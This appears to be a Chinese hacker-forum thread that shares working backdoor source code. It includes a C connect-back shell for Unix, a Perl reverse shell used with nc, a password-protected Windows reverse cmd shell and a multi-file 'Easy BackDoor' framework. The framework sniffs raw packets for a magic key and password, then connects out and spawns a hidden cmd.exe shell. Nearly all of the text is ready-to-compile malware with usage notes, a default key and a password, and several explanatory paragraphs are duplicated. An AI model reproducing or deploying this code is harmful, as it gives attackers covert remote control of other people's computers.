代码 |
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <netdb.h> void usage(); char shell[]="/bin/sh"; char message[]="s8s8 welcome/n"; int sock; int main(int argc, char *argv[]) { if(argc <3){ usage(argv[0]); } struct sockaddr_in server; if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Couldn't make socket!/n"); exit(-1); } server.sin_family = AF_INET; server.sin_port = htons(atoi(argv[2])); server.sin_addr.s_addr = inet_addr(argv[1]); if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) { printf("Could not connect to remote shell!/n"); exit(-1); } send(sock, message, sizeof(message), 0); dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); execl(shell,"/bin/sh",(char *)0); close(sock); return 1; } void usage(char *prog[]) { printf("/t/ts8s8 connect back door/n/n"); printf("/t sql@s8s8.net/n/n"); printf("Usage: %s <reflect ip> <port>/n", prog); exit(-1); } |
测试结果如下图:
县得有点简陋了,不过还能讲究的过去。。如果需要可以写成LKM,呵呵。
代码 |
#!/usr/bin/perl #http://www.s8s8.net #cnhackTNT[AT]hotmail.com use strict; use Socket; use Cwd; use IO::Handle; if ( @ARGV < 1 ) { print <<"EOF"; usage: nc -l -p PORT(default 66666) on your local system first,then Perl $0 Remote IP <space> Remote_port(default 66666) Type 'quit' to exit or press Enter to gain shell when u under the 'S8S8 console'. Enjoy ur shell! Welcome to http://www.s8s8.net EOF exit; } my $remote = $ARGV[0]; my $remote_port = $ARGV[1] || 66666; my $proto = getprotobyname('tcp'); my $pack_addr = sockaddr_in( $remote_port, inet_aton($remote) ); my $path = cwd(); my $shell = '/bin/sh -i'; socket( SOCK, AF_INET, SOCK_STREAM, $proto ) || die "socket error: $!"; STDOUT->autoflush(1); SOCK->autoflush(1); connect( SOCK, $pack_addr ) || die "connection error : $!"; open STDIN, ">&SOCK"; open STDOUT, ">&SOCK"; open STDERR, ">&SOCK"; print "You are in $path/n"; print "Welcome to www.s8s8.net/nEnjoy ur shell./n/n[S8S8 console]>"; while (<SOCK>) { chomp; if ( lc($_) eq 'quit' ) { print "/nWelcome to www.s8s8.net"; print "/nByeBye~~~!/n"; exit; } elsif ($_) { system($shell); print "/n[S8S8 console]>"; } else { print "/n[S8S8 console]>"; } } close SOCK; exit; |
很简单,功能和上面sql兄那个c版本的差不多。
代码 |
#include <winsock2.h> #include <windows.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #pragma comment (lib,"ws2_32.lib") #define PASSSUCCESS "Password success!/n" #define PASSERROR "Password error./n" #define BYEBYE "ByeBye!/n" #define WSAerron WSAGetLastError() #define erron GetLastError() VOID WINAPI EXEBackMain (LPVOID s); //BOOL EXEBackMain (SOCKET sock); int main (int argc, TCHAR *argv[]) { SOCKET sock=NULL; struct sockaddr_in sai; TCHAR UserPass[20]={0}; //用户设置密码缓冲 TCHAR PassBuf[20]={0}; //接收密码缓冲 TCHAR PassBanner[]="/nPassword:"; TCHAR Banner[]="---------dahubaobao backdoor---------/n"; if (argc!=4) { fprintf(stderr,"Code by dahubaobao/n" "Usage:%s [DestIP] [Port] [Password]/n",argv[0]); return 0; } sai.sin_family=AF_INET; //判断参数合法性,并填充地址结构 //IP地址不能大于15 if (strlen(argv[1])<=15) sai.sin_addr.s_addr=inet_addr(argv[1]); else { #ifdef DEBUGMSG printf("Internet address no larger than /"15/"/n"); #endif goto Clean; } //端口不能小于0 && 大于65535 if (atoi(argv[2])>0&&atoi(argv[2])<65535) sai.sin_port=htons(atoi(argv[2])); else { #ifdef DEBUGMSG printf("Port no less than /"0/" and larger than /"65535/""); #endif goto Clean; } //密码最大16位 if (strlen(argv[3])<=16) strcpy(UserPass,argv[3]); //复制密码 else { #ifdef DEBUGMSG printf("Please connect password error/n"); #endif goto Clean; } while (TRUE) { WSADATA wsadata; BOOL ThreadFlag=FALSE; DWORD ThreadID=0; int nRet=0; nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化 if (nRet) { #ifdef DEBUGMSG printf("WSAStartup() error: %d/n",nRet); #endif return 0; } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock==INVALID_SOCKET) { #ifdef DEBUGMSG printf("socket() GetLastError reports %d/n",WSAerron); #endif goto Clean; } nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr)); if (nRet!=SOCKET_ERROR) { nRet=send(sock,Banner,sizeof (Banner),0); if (nRet==SOCKET_ERROR) { #ifdef DEBUGMSG sprintf(MsgError,"send() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } while (TRUE) { nRet=send(sock,PassBanner,sizeof (PassBanner),0); if (nRet==SOCKET_ERROR) { #ifdef DEBUGMSG sprintf(MsgError,"send() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0); if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0) { #ifdef DEBUGMSG send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0); #endif ThreadFlag=TRUE; break; } else { #ifdef DEBUGMSG send(sock,PASSERROR,sizeof (PASSERROR),0); #endif continue; } if (nRet==SOCKET_ERROR) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } Sleep(100); } if (ThreadFlag) { //EXEBackMain(sock); CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain, (LPVOID)sock,0,&ThreadID); } } Sleep(1000); } Clean: if (sock!=NULL) closesocket(sock); WSACleanup(); return 0; } VOID WINAPI EXEBackMain (LPVOID s) //BOOL EXEBackMain (SOCKET sock) { SOCKET sock=(SOCKET)s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE hRead=NULL,hWrite=NULL; TCHAR CmdSign[]="/ndahubaobao://>"; while (TRUE) { TCHAR MsgError[50]={0}; //错误消息缓冲 TCHAR Cmdline[300]={0}; //命令行缓冲 TCHAR RecvBuf[1024]={0}; //接收缓冲 TCHAR SendBuf[2048]={0}; //发送缓冲 SECURITY_ATTRIBUTES sa; DWORD bytesRead=0; int ret=0; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor=NULL; sa.bInheritHandle=TRUE; //创建匿名管道 if (!CreatePipe(&hRead,&hWrite,&sa,0)) { #ifdef DEBUGMSG sprintf(MsgError,"CreatePipe() GetLastError reports %d/n",erron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } si.cb=sizeof(STARTUPINFO); GetStartupInfo(&si); si.hStdError=hWrite; si.hStdOutput=hWrite; //进程(cmd)的输出写入管道 si.wShowWindow=SW_HIDE; si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录 strcat(Cmdline,"//cmd.exe /c "); //拼接cmd ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符 if (ret==SOCKET_ERROR) { #ifdef DEBUGMSG sprintf(MsgError,"send() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据 //如果为exit或quit,就退出 if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0) { #ifdef DEBUGMSG send(sock,BYEBYE,sizeof (BYEBYE),0); #endif goto Clean; } //表示对方已经断开 if (ret==SOCKET_ERROR) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif goto Clean; } //表示接收数据出错 if (ret<=0) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d/n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif continue; } Sleep(100); //休息一下,可要可不要 strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令 //创建进程,也就是执行cmd命令 if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { #ifdef DEBUGMSG sprintf(MsgError,"CreateProcess() GetLastError reports %d/n",erron); send(sock,MsgError,sizeof (MsgError),0); #endif continue; } CloseHandle(hWrite); while (TRUE) { //无限循环读取管道中的数据,直到管道中没有数据为止 if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0) break; send(sock,SendBuf,bytesRead,0); //发送出去 memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零 Sleep(100); //休息一下 } } Clean: //释放句柄 if (hRead!=NULL) CloseHandle(hRead); if (hWrite!=NULL) CloseHandle(hWrite); //释放SOCKET if (sock!=NULL) closesocket(sock); WSACleanup(); ExitThread(0); //return 0; } |
我把后门分成四个部分,一个个部分算作一个模块,首先是主函数入口分成一部分,将来要加一些参数设置,初始化,隐藏进程等等,都在这个主函数部分完成,现在是什么都没有,代码比较少..
上面这个部分除了mGotoStart();这个函数,其他都是内部的.
这个mGotoStart();就是sniffer的开始,也就是我们的第二个部分,嗅探部分,我写了三种数据包,udp,tcp,icmp的嗅探,事实上tcp能用上的很少(除非你用某些发包软件直接发tcp包)所以我测试的时候也是用udp和icmp来测试的,代码如下:
上面这个部分,除了UserThreadFunc函数是外部的,其他都是内部的,实现了嗅探.
UserThreadFunc函数就是用户线程函数,到了这个函数,就已经和用户建立了连接,下面就是交互式shell的代码了.如下:
最后一个部分是公共函数部分,提供了一些函数的包装.如下:
还要来一个就是程序的头文件:如下:
所有的公共函数都在这里面.
后语:
之所以写这么多代码是因为我本人喜欢比较稳定的程序,大小不是问题,上面这个程序应该算是非常稳定的后门框架了(因为只用socket 1.0的函数写),包括用户shell和sniffer连接部分,用户可以无限次数的断开,重复连接,产生shell和退出,不会造成句柄和内存的堆积等等问题.
另外,刚才看了看代码,发现不需要用的东西还是很多,大概是为了升级和扩充方便,很多地方留下了接口,有时间我会发一个精简的代码.^_^.
以下是编译好后测试的一张图:
主机是192.168.1.2,目标机器是192.168.1.3,本机监听端口为8888,默认的数据包标志是"www.s8s8.net",密码为"zvrop".
发送数据包是用vc的-u发送udp数据,c:/x.txt里面的内容是:
代码 |
#include "mainheader.h" MAINPARAMETERSTK mpStk={"zvrop","www.s8s8.net"}; //打印帮助 void Usage(char *programName) { char szHelp[] = ""; fprintf(stderr,"%s usage:%s/n",programName,szHelp); } //初始化参数 int HandleOptions(int argc,char *argv[]) { int i,rn=1; for (i=1; i< argc;i++) { if (argv[i][0] == '-') { switch (argv[i][1]) { case '?': case 'h': case 'H': Usage(argv[0]); rn = 0; break; default: Usage(argv[0]); rn = 0; break; } } } return rn; } //正式开始工作的主函数 extern int ListenUserMain(void); int mGotoStart(){ //申请网络 if(!SetSocketDll()) return 0; int ret=0; //出错最大100次就结束程序 while(true){ if(!ListenUserMain()){ if(ret++ > 100) break; } } return 1; } //程序入口 int main(int argc, char* argv[]) { if(argc > 1) { if(HandleOptions(argc,argv)) { return 1; }else { return 0; } }else { mGotoStart(); return 1; } return 1; } |
上面这个部分除了mGotoStart();这个函数,其他都是内部的.
这个mGotoStart();就是sniffer的开始,也就是我们的第二个部分,嗅探部分,我写了三种数据包,udp,tcp,icmp的嗅探,事实上tcp能用上的很少(除非你用某些发包软件直接发tcp包)所以我测试的时候也是用udp和icmp来测试的,代码如下:
代码 |
#include "mainheader.h" #define MAX_PACK_LEN 65535 #define SIO_RCVALL _WSAIOW(IOC_VENDOR,1) SNIFFERDATASTK sfStk; //判断数据包的正确性 int ChkBuff(char *msg, int msglen) { int i1 = strlen(mpStk.KeyData), i2 = strlen(mpStk.szUserPasd); if(strnicmp(msg, mpStk.KeyData, i1) == 0){ char *fp = &msg[i1+1]; if(2 != getcmdline(fp,(char*)(&sfStk),100,3)){ return 0; } if(!chkPass(sfStk.name)){ return 0; } return 1; } return 0; } //数据包解包 int DecodePack(char *buf, int buflen) { IP_HEADER *pIpheader; int iProtocol; pIpheader = (IP_HEADER *)buf; iProtocol = pIpheader->proto; int iIphLen = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf); int PackSize = 0; switch(iProtocol){ case IPPROTO_UDP: PackSize = sizeof(UDP_HEADER); break; case IPPROTO_ICMP: PackSize = sizeof(UDP_HEADER); break; case IPPROTO_TCP: PackSize = sizeof(TCP_HEADER); default : return 0; } if((unsigned)(buflen-iIphLen-PackSize) < (strlen(mpStk.KeyData)+10)) return 0; if(ChkBuff(buf+iIphLen+PackSize, buflen-iIphLen-PackSize)) return 1; return 0; } //循环接收数据包 int RecvRightData(SOCKET Sock) { char RecvBuf[MAX_PACK_LEN]; int RecvDataLen; while(true){ memset(RecvBuf, 0, MAX_PACK_LEN); RecvDataLen = recv(Sock, RecvBuf, MAX_PACK_LEN, 0); if(SOCKET_ERROR == RecvDataLen || RecvDataLen < 46) return 0; if(DecodePack(RecvBuf, RecvDataLen)){ return 1; } } return 0; } //获得本机外部ip unsigned long msGetipByStrOUT(){ char in[20]="",out[20]=""; if(msGetip(in,out)){ return inet_addr(out); }else{ return inet_addr("127.0.0.1"); } } //设置网络环境,开始嗅探 int Start_Sniffer(SOCKET SnfSock) { SOCKADDR_IN addr_in; addr_in.sin_family = AF_INET; addr_in.sin_port = INADDR_ANY; addr_in.sin_addr.S_un.S_addr = msGetipByStrOUT(); if(SOCKET_ERROR == bind(SnfSock, (struct sockaddr*)&addr_in, sizeof(addr_in))){ ConCloseSocket(&SnfSock); return 0; } DWORD dwBufferLen[10]; DWORD dwBufferInLen = 1; DWORD dwBytesReturned = 0; if(SOCKET_ERROR == WSAIoctl(SnfSock, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned , NULL , NULL)){ ConCloseSocket(&SnfSock); return 0; } return 1; } //网络开始函数 extern DWORD WINAPI UserThreadFunc(LPVOID lpParam); int ListenUserMain(void) { SOCKET SnfSock; if(!SetSocketHand(&SnfSock, SOCK_RAW)) { return 0; } if(!Start_Sniffer(SnfSock)) { return 0; } if(!RecvRightData(SnfSock)) { ConCloseSocket(&SnfSock); return 0; } ConCloseSocket(&SnfSock); if(!SetSocketHand(&SnfSock, SOCK_STREAM)) { return 0; } if(!ContoReServer(&SnfSock, (unsigned short)atoi(sfStk.nPort), sfStk.szIp)) { ConCloseSocket(&SnfSock); return 0; } if(!UserThreadFunc((LPVOID)&SnfSock)){ return 0; } return 1; } |
上面这个部分,除了UserThreadFunc函数是外部的,其他都是内部的,实现了嗅探.
UserThreadFunc函数就是用户线程函数,到了这个函数,就已经和用户建立了连接,下面就是交互式shell的代码了.如下:
代码 |
#include "mainheader.h" //关闭cmd进程,防止用户强行断开连接 void closeCMD(USERCONTSTK * sck){ if(sck->procinfo.hProcess != NULL){ TerminateProcess(sck->procinfo.hProcess, -9); ConCloseHandle(&sck->procinfo.hProcess); } } //结束交互线程B,并关闭相应资源 void KillThreadHdB(USERCONTSTK * sck){ if(sck->UserThreadHdB != NULL){ TerminateThread(sck->UserThreadHdB, 0); ConCloseHandle(&sck->UserThreadHdB); ConCloseHandle(&sck->hReadPipe); ConCloseHandle(&sck->hReadFile); ConCloseHandle(&sck->hWriteFile); ConCloseHandle(&sck->hWritePipe); xfree(sck->buff); } } //结束cmd交互,并中断连接 void quitTELcon(USERCONTSTK * sck){ if(sck->getCMD == 1){ KillThreadHdB(sck); closeCMD(sck); sck->getCMD = 0; } rnvCasemsg(sck->UserSck, "Bye~^_^~/r/n"); sck->ExitIn = 1; } //结束cmd交互,返回后门shell下 void backtoCON(USERCONTSTK * sck) { KillThreadHdB(sck); rnvCasemsg(sck->UserSck,"==========================/r/n" "S8S8//>"); sck->getCMD = 0; } //交互线程B,获取cmd输出,发送给用户端 DWORD WINAPI ThreadFuncB(LPVOID lpParam){ #define MAX_BUFF_TB 4096 USERCONTSTK *ThreadST = (USERCONTSTK *)lpParam; ThreadST->buff = (char*)malloc(MAX_BUFF_TB*sizeof(char)); if(ThreadST->buff == NULL) return 0; ThreadST->Bann = 1; unsigned long howlong; DWORD rest; while(true){ rest = ReadFile(ThreadST->hReadFile, ThreadST->buff, MAX_BUFF_TB, &howlong, NULL); if(rest <= 0){ xfree(ThreadST->buff); return 0; } send(ThreadST->UserSck, ThreadST->buff, howlong, 0); } return 0; } //产生并捆绑一个cmdshell. short GetConSel(USERCONTSTK *sck){ if(sck->getCMD == 1) { return 0; } memset(&sck->pipeattrA, 0, sizeof(sck->pipeattrA)); sck->pipeattrA.nLength = sizeof(SECURITY_ATTRIBUTES); sck->pipeattrA.lpSecurityDescriptor = NULL; sck->pipeattrA.bInheritHandle = TRUE; if(!CreatePipe(&sck->hReadPipe, &sck->hWriteFile, &sck->pipeattrA, 0)){ rnvErrorID(sck->UserSck, "CreatePipe:"); return 0; } memset(&sck->pipeattrB, 0, sizeof(sck->pipeattrB)); sck->pipeattrB.nLength = sizeof(SECURITY_ATTRIBUTES); sck->pipeattrB.lpSecurityDescriptor = NULL; sck->pipeattrB.bInheritHandle = TRUE; if(!CreatePipe(&sck->hReadFile, &sck->hWritePipe, &sck->pipeattrB, 0)){ rnvErrorID(sck->UserSck, "CreatePipe:"); ConCloseHandle(&sck->hReadPipe); ConCloseHandle(&sck->hWriteFile); return 0; } DWORD UserThreadIdB; sck->Bann = 0; if((sck->UserThreadHdB = CreateThread(NULL, 0, ThreadFuncB, (LPVOID *)sck, 0, &UserThreadIdB))==0){ rnvErrorID(sck->UserSck, "CreateThreadB:"); ConCloseHandle(&sck->hReadPipe); ConCloseHandle(&sck->hWriteFile); ConCloseHandle(&sck->hReadFile); ConCloseHandle(&sck->hWritePipe); return 0; } STARTUPINFO starinfo; GetStartupInfo(&starinfo); starinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; starinfo.hStdInput = sck->hReadPipe; starinfo.hStdError = starinfo.hStdOutput = sck->hWritePipe; starinfo.wShowWindow = SW_HIDE; char Cmdpath[MAX_PATH+20] = ""; char ConSystemPath[MAX_PATH] = ""; DWORD ren = GetSystemDirectory(ConSystemPath, MAX_PATH); if(ren != strlen(ConSystemPath)){ rnvErrorID(sck->UserSck, "GetSystemDirectory:"); KillThreadHdB(sck); return 0; } sprintf(Cmdpath, "%s//cmd.exe", ConSystemPath); if(CreateProcess(Cmdpath, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &starinfo, &sck->procinfo)==0){ rnvErrorID(sck->UserSck, "CreateProcess:"); KillThreadHdB(sck); return 0; } sprintf(Cmdpath,"========================/r/n" "=ThreadID = %ld/r/n" "=ProcessID = %ld/r/n" "========================/r/n/0", UserThreadIdB, sck->procinfo.dwProcessId); rnvCasemsg(sck->UserSck, Cmdpath); //如果建立线程B超时,退出 short _timeOut = 0; while(sck->Bann == 0){ if(_timeOut++ > 50){ rnvErrorID(sck->UserSck, "TIMEOUT"); closeCMD(sck); KillThreadHdB(sck); return 0; } Sleep(50); } //设置为已经获得cmdshell sck->getCMD = 1; return 1; } //输出banner void TypeHelp(USERCONTSTK * sck){ rnvCasemsg(sck->UserSck,"/r/n+++++++++++++++++++++++++++++++++++++++++++++++++++/r/n" "+quit<q> exit/r/n" "+help<h> exit/r/n" "+shell<s> cmd shell/r/n" "+++++++++++++++++++++++++++++++++++++++++++++++++++/r/n"); } //命令行分析 void WINAPI gocommand(USERCONTSTK * sck,char *comm) { ConDel1013(comm); char cmdline[10][256] = {""}; int comline_num = getcmdline(comm, &cmdline[0][0], 256, 10) + 1; if(strcmpi(cmdline[0], "") == 0){ return; } cmdline[0][0]=toupper(cmdline[0][0]); switch(cmdline[0][0]){ case 'Q':{ if((strcmpi(cmdline[0], "q") == 0) || (strcmpi(cmdline[0], "quit") == 0) && comline_num == 1) quitTELcon(sck); else goto NoCommand; break; } case 'S':{ if((strcmpi(cmdline[0], "s") == 0) || (strcmpi(cmdline[0], "shell") == 0) && comline_num == 1) GetConSel(sck); else goto NoCommand; break; } case '?': case 'H':{ if((strcmpi(cmdline[0], "h") == 0 || strcmpi(cmdline[0], "help") == 0 || strcmpi(cmdline[0], "?") == 0)) TypeHelp(sck); else goto NoCommand; break; } default: NoCommand: rnvCasemsg(sck->UserSck,"Bad Command!/r/n"); } } //交互线程A,可以作为后门本身的shell,也可以作为CMDshell的输入 void BeginShell(USERCONTSTK *sck){ char buff[1024] = {0},buf[1024] = {0}; long howlong; DWORD nothing; rnvCasemsg(sck->UserSck, "++++++++++++++++++++++++++++++++++++/r/n" "+Easy BackDoor/r/n" "+Coder By ZV(zvrop@163.com)/r/n" "+Site http://www.s8s8.net/r/n" "++++++++++++++++++++++++++++++++++++/r/n" "S8S8//>"); while(true){ memset(buf, 0, 1024); howlong = recv(sck->UserSck, buf, 1023 - strlen(buff), 0); if(howlong <= 0){ quitTELcon(sck); return; } strncat(buff, buf, howlong); if(buf[howlong-1] == '/n'){ if(sck->getCMD != 0){ if(buff[0] == '`'){ gocommand(sck, buff + 1); }else{ WriteFile(sck->hWriteFile, buff, strlen(buff), ¬hing, NULL); if(!strnicmp(buff, "exit", 4)) backtoCON(sck); } }else{ gocommand(sck, buff); if(sck-> ExitIn == 1){ return; } rnvCasemsg(sck->UserSck, "S8S8//>"); } memset(buff, 0, 1024); if(sck-> ExitIn == 1){ return; } } } } //用户界面入口,申请一个结构用来保存,是为了兼容多用户 DWORD WINAPI UserThreadFunc(LPVOID lpParam){ USERCONTSTK *sck = (USERCONTSTK *)malloc(sizeof(USERCONTSTK)); if(sck == NULL){ rnvErrorID(*(SOCKET *)lpParam, "malloc:"); ConCloseSocket((SOCKET *)lpParam); return 0; } memset(sck, 0, sizeof(USERCONTSTK)); sck->UserSck = *(SOCKET *)lpParam; BeginShell(sck); ConCloseSocket(&sck->UserSck); free(sck); return 1; } |
最后一个部分是公共函数部分,提供了一些函数的包装.如下:
代码 |
#include "mainheader.h" #define MAX_TIMEOUT 20000 //关闭socket句柄 void ConCloseSocket(SOCKET *Sock) { if(*Sock == 0 || *Sock == SOCKET_ERROR) return; closesocket(*Sock); *Sock = 0; } //关闭句柄 void ConCloseHandle(HANDLE *Hand){ if(*Hand == NULL || *Hand == INVALID_HANDLE_VALUE) return; CloseHandle(*Hand); *Hand = NULL; } //释放内存 void xfree(char *bf){ if(bf == NULL || bf == 0) return; free(bf); bf = NULL; } //设置监听 int LocalListen(SOCKET Sock) { if(listen(Sock, 5) == SOCKET_ERROR) return 0; return 1; } //连接远程服务器 int ContoReServer(SOCKET *sock, unsigned short port, char *reAddr) { struct sockaddr_in server_addr; server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port); struct hostent *server_host; server_host = gethostbyname( reAddr ); if(server_host == NULL) return 0; memcpy( (void *) &server_addr.sin_addr, (void *) server_host->h_addr, server_host->h_length ); int len = sizeof( server_addr ); if( connect( *sock, (struct sockaddr *) &server_addr, len ) < 0 ) return 0; return 1; } //申请网络环境 int SetSocketDll(void) { WSADATA wsaData; if(SOCKET_ERROR == WSAStartup(MAKEWORD(2, 2), &wsaData)){ return 0; } return 1; } //申请连接句柄 int SetSocketHand(SOCKET *Sock, DWORD SOCKTYPE) { *Sock = socket(AF_INET , SOCKTYPE , IPPROTO_IP); if(*Sock == SOCKET_ERROR) return 0; return 1; } //发送消息给用户端 void rnvCasemsg(SOCKET Sock, char *msg) { if (strlen(msg) <= 0) return; send(Sock, msg, strlen(msg),0); } //发送带错误码的消息给用户端 void rnvErrorID(SOCKET Sock, char *msg) { char rmsg[256] = {""}; sprintf(rmsg, "/r/nERROR>%s:%d/r/n", msg, GetLastError()); rnvCasemsg(Sock, rmsg); } //兼容nc和telnet void ConDel1013(char *str) { for(unsigned int i =0; i < strlen(str); i++) if(str[i] == '/r' || str[i] == '/n') str[i] = '/0'; } extern MAINPARAMETERSTK mpStk; //密码比较,这里可以加上md5 short chkPass(char *pass) { if(strnicmp(pass, mpStk.szUserPasd, strlen(mpStk.szUserPasd))==0) return 1; return 0; } //分解命令行的函数 short getcmdline(char *comm, char *cmdline, short cont, short num){ short j = 0, geti = 0, is20 = 0; for(short i = 0; comm[i] != '/0' && geti < num; i++){ if(comm[i] != ' ' || is20 >= 1){ if(comm[i] == '"') is20++; else if(is20 >= 2 && comm[i] == ' ') is20 = 0; else if(j < cont){ cmdline[geti * cont + j] = comm[i]; j++; } } if(comm[i] == ' ' && geti < num && is20 == 0){ geti++; j = 0; } } return geti; } //获得本机IP函数 int msGetip(char *ipin, char* ipout){ char cHostName[80]=""; if((gethostname(cHostName, 80)) == SOCKET_ERROR) return false; struct hostent *Host = gethostbyname(cHostName); if(NULL!=Host){ struct in_addr addr; int i = 0; while(Host->h_addr_list[i] != NULL){ memcpy(&addr, Host->h_addr_list[i], sizeof(addr)); if(addr.S_un.S_un_b.s_b1 == 192 && addr.S_un.S_un_b.s_b2 == 168){ if(strlen(ipin) == 0){ strcpy(ipin, inet_ntoa(addr)); } }else if(addr.S_un.S_un_b.s_b1 == 172 && (addr.S_un.S_un_b.s_b2 >= 16 && addr.S_un.S_un_b.s_b2 <= 131)){ if(strlen(ipin) == 0){ strcpy(ipin, inet_ntoa(addr)); } }else if(addr.S_un.S_un_b.s_b1 == 10 ){ if(strlen(ipin) == 0){ strcpy(ipin, inet_ntoa(addr)); } }else{ if(strlen(ipout) == 0){ strcpy(ipout, inet_ntoa(addr)); } } i++; } if(strlen(ipout) == 0) { strcpy(ipout, ipin); } if(strlen(ipin) == 0){ strcpy(ipin, ipout); } return 1; } return 0; } |
还要来一个就是程序的头文件:如下:
代码 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <windows.h> //用户结构 typedef struct _USERCONTSTK{ int getCMD; char* buff; int ExitIn; int Bann; SOCKET UserSck; HANDLE UserThreadHdB; HANDLE hWritePipe; HANDLE hWriteFile; HANDLE hReadPipe; HANDLE hReadFile; SECURITY_ATTRIBUTES pipeattrA; SECURITY_ATTRIBUTES pipeattrB; PROCESS_INFORMATION procinfo; }USERCONTSTK,*PUSERCONTSTK; //后门参数结构 typedef struct _MAINPARAMETERSTK{ char szUserPasd[100]; char KeyData[100]; }MAINPARAMETERSTK,*PMAINPARAMETERSTK; //嗅探数据结构 typedef struct _SNIFFERDATASTK{ char name[100]; char szIp[100]; char nPort[100]; }SNIFFERDATASTK,*PSNIFFERDATASTK; //ip头部结构 typedef struct _iphdr { unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP; }IP_HEADER; //tcp头部结构 typedef struct _tcphdr { USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp; }TCP_HEADER; //udp头部结构 typedef struct _udphdr { unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_len; unsigned short uh_sum; } UDP_HEADER; //icmp头部结构 typedef struct _icmphdr { BYTE i_type; BYTE i_code; USHORT i_cksum; USHORT i_id; USHORT i_seq; ULONG timestamp; }ICMP_HEADER; //一些变量和函数的声名 extern MAINPARAMETERSTK mpStk; extern void ConCloseSocket(SOCKET *Sock); extern int LocalListen(SOCKET Sock); extern int ContoReServer(SOCKET *sock, unsigned short port, char *reAddr); extern int SetSocketDll(void); extern int SetSocketHand(SOCKET *Sock, DWORD SOCKTYPE); extern void rnvCasemsg(SOCKET Sock, char *msg); extern void rnvErrorID(SOCKET Sock, char *msg); extern void ConDel1013(char *str); extern short chkPass(char *pass); extern short getcmdline(char *comm, char *cmdline, short cont, short num); extern int msGetip(char *ipin, char* ipout); extern void ConCloseHandle(HANDLE *Hand); extern void xfree(char *bf); |
所有的公共函数都在这里面.
后语:
之所以写这么多代码是因为我本人喜欢比较稳定的程序,大小不是问题,上面这个程序应该算是非常稳定的后门框架了(因为只用socket 1.0的函数写),包括用户shell和sniffer连接部分,用户可以无限次数的断开,重复连接,产生shell和退出,不会造成句柄和内存的堆积等等问题.
另外,刚才看了看代码,发现不需要用的东西还是很多,大概是为了升级和扩充方便,很多地方留下了接口,有时间我会发一个精简的代码.^_^.
以下是编译好后测试的一张图:
主机是192.168.1.2,目标机器是192.168.1.3,本机监听端口为8888,默认的数据包标志是"www.s8s8.net",密码为"zvrop".
发送数据包是用vc的-u发送udp数据,c:/x.txt里面的内容是: